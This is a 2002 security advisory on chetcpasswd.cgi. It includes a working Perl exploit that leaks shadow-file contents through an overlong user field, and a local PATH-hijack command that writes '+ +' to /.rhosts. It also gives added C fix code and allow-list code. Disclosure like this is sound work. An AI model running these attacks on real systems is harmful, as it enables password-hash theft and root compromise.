[UNIX] chetcpasswd.cgi Multiple Vulnerabilities

From: support@securiteam.com
Date: 12/22/02


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      chetcpasswd.cgi Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://web.onda.com.br/orso/> Chpasswd is a utility that allows users to
    change their Squid or Web password from a browser. Several
    vulnerabilities have been found that allow remote attackers to obtain the
    tail of the shadow file without a valid user (exploit code below), and a
    possible local exploit to obtain a root shell.

    DETAILS

    Vulnerable systems:
     * chetcpasswd version 1.2 and earlier

    Exploit:
    If you fill the form with 120 characters in the user field, the system
    returns the tail of the shadow file without any restriction.
     
    Exploit Code (Remote):
    #!/usr/bin/perl -w
    #Exploit coded by Victor Pereira <vpereira@modulo.com.br>
    #Thanks to Alexandre Vargas And Thiago Zaninotti
    use strict;
    use Socket;
    my ($remote, $port, $iaddr, $paddr,
        $proto, $linha, $query, $len_query, $ARGC, $fakeuser, $pattern);

    $ARGC = @ARGV;
    if ($ARGC < 1) {
        print "chetcpasswd.cgi exploit\n";
        print "coded by VP <vpereira\@modulo.com.br>\n";
        print "Usage:$0 <host>\n";
        exit;
    }
    # over-long value for the "user" field (see DETAILS above)
    $fakeuser = "ASSHOLEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
    $pattern = "User: E*E";    # removed from the response before printing

    $query = "user=$fakeuser&old_pw=teste&new_pw1=teste1&new_pw2=teste1&change='Altere minha senha'";

    $len_query = length($query);
    $remote = $ARGV[0];
    $port = 80;    # HTTP port; a service name would be resolved below
    if ($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
    die "No port" unless $port;
    $iaddr = inet_aton($remote) || die "no host: $remote";
    $paddr = sockaddr_in($port, $iaddr);

    $proto = getprotobyname('tcp');
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket: $!";
    connect(SOCK, $paddr) || die "connect: $!";
    select(SOCK); $| = 1; select(STDOUT);    # unbuffered writes to the socket
    print SOCK "POST /cgi-bin/chetcpasswd.cgi HTTP/1.0\n";
    print SOCK "Connection: Keep-Alive\n";
    print SOCK "Content-type: application/x-www-form-urlencoded\n";
    print SOCK "Content-length: $len_query\n";
    print SOCK "\n$query\r\n\r\n";

    $linha = "";
    while (<SOCK>) {
        $linha = $_;
        # print only the lines that carried HTML tags, with the tags stripped
        if ($linha =~ s/<.*?>//g) {
            $linha =~ s/$pattern//g;
            print $linha;
        }
    }
    close(SOCK) || die "close: $!";
    exit;


    Exploit (Local):
     Reading the source code, you find (lines 229-235) something like this:
    <codigo>
     
          if(ok) {
                   sprintf(command,"cp %s %s",template,pwdfile);
            system(command);
            unlink(template);
            sprintf(Msg,"<font color=blue size=+2>%s %s.",msg18,User);
            Hmsg(Msg, Uid, Gid);
          }
    </codigo>
     

    The code trusts the PATH environment variable: if you create a script
    named "cp" and change the value of PATH, you can make the CGI execute
    your cp through the WWW interface.
     
    Something like:
     echo "echo + + /.rhosts" > /tmp/cp
     export PATH=/tmp:$PATH

    Then you try to change your password via the Web interface.
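
    A hardened replacement for the quoted cp/system() step, added here as an example (it is not chetcpasswd's own code; the function names and the demo file paths are assumptions): rename(2) swaps the temp file into place atomically without invoking any external binary, so a modified PATH has nothing to redirect.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Replace pwdfile with the freshly written temp file: rename(2) needs no
 * helper binary, so a user-controlled PATH cannot redirect the copy, the swap
 * is atomic, and lstat rejects a symlink planted at the temp path.
 * Returns 0 on success, -1 on error (the temp file is removed either way). */
int install_password_file(const char *tmpl, const char *pwdfile)
{
    struct stat st;
    if (lstat(tmpl, &st) != 0 || !S_ISREG(st.st_mode) ||
        rename(tmpl, pwdfile) != 0) {
        unlink(tmpl);
        return -1;
    }
    return 0;
}

/* Demo helper: create a temp file holding `content`, path returned in `path`. */
static int write_temp(char *path, size_t n, const char *content)
{
    snprintf(path, n, "/tmp/chetcpasswd_demo.XXXXXX");
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    ssize_t w = write(fd, content, strlen(content));
    close(fd);
    return w == (ssize_t)strlen(content) ? 0 : -1;
}

/* Constructed scenario: PATH points at /tmp as in the advisory, yet the
 * password file ends up with the new contents and the temp file is gone.
 * Returns 1 when both hold, 0 otherwise. */
int demo_path_attack_is_moot(void)
{
    char tmpl[64], pwd[64], buf[64] = "";
    setenv("PATH", "/tmp", 1);
    if (write_temp(tmpl, sizeof tmpl, "alice:NEWHASH\n") != 0) return 0;
    if (write_temp(pwd, sizeof pwd, "alice:OLDHASH\n") != 0) return 0;
    if (install_password_file(tmpl, pwd) != 0) return 0;
    FILE *f = fopen(pwd, "r");
    if (!f) return 0;
    size_t got = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[got] = '\0';
    int ok = strcmp(buf, "alice:NEWHASH\n") == 0 && access(tmpl, F_OK) != 0;
    unlink(pwd);
    return ok;
}
```

    If the temp file must live on another filesystem than the target, rename(2) fails with EXDEV; in that case copy with open/read/write in-process rather than falling back to a shell command.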
     
    Workaround:
    From the README:
     
     Create /etc/chetcpasswd.allow file with IP's or sub-nets allowed to use.
     Eg.: 192.168.82.10 - only this IP will use
     192.168.82.0 - IP's from 1 to 255
     192.168.0.0 - ...
     192.0.0.0 - ...
     0.0.0.0 - allow anybody. A bad choice...
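
    The allow-list semantics quoted from the README, implemented as an added example (not chetcpasswd's own parser; the function names are assumptions and treating trailing zero octets as wildcards is my reading of the examples above). It also walks a whole allow file held in memory, skipping comments and malformed lines:

```c
#include <stdio.h>
#include <string.h>

/* Parse a dotted quad into four octets; returns 0 on success, -1 on bad input. */
int parse_ipv4(const char *s, unsigned char out[4])
{
    unsigned a, b, c, d;
    char extra;
    if (sscanf(s, "%u.%u.%u.%u%c", &a, &b, &c, &d, &extra) != 4 ||
        a > 255 || b > 255 || c > 255 || d > 255)
        return -1;
    out[0] = a; out[1] = b; out[2] = c; out[3] = d;
    return 0;
}

/* README semantics: trailing zero octets in an entry are wildcards, so
 * 192.168.82.0 covers the whole /24, 192.0.0.0 the /8 and 0.0.0.0 everyone.
 * Returns 1 if client is covered by entry, 0 if not, -1 on unparsable input. */
int entry_covers(const char *entry, const char *client)
{
    unsigned char e[4], c[4];
    int n = 4;
    if (parse_ipv4(entry, e) != 0 || parse_ipv4(client, c) != 0) return -1;
    while (n > 0 && e[n - 1] == 0) n--;      /* strip wildcard octets */
    return memcmp(e, c, n) == 0;
}

/* Walk an allow file held in memory (one entry per line, '#' comments).
 * Returns 1 if any entry covers client, else 0. Malformed lines are
 * skipped; a permissive 0.0.0.0 line still counts, as the README warns. */
int allowed_by_list(const char *list_text, const char *client)
{
    char line[64];
    const char *p = list_text;
    while (*p) {
        size_t len = strcspn(p, "\n");
        size_t take = len < sizeof line - 1 ? len : sizeof line - 1;
        memcpy(line, p, take);
        line[take] = '\0';
        line[strcspn(line, "#\r")] = '\0';   /* drop comments and CR */
        char *tok = strtok(line, " \t");
        if (tok && entry_covers(tok, client) == 1) return 1;
        p += len + (p[len] == '\n');
    }
    return 0;
}
```

    The allow file only narrows who can reach the CGI; the overlong user field and the PATH trust remain until the code itself is fixed, and an entry of 0.0.0.0 restores the original exposure.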

    ADDITIONAL INFORMATION

    This information has been provided by <mailto:vpereira@modulo.com.br>
    Victor Pereira.
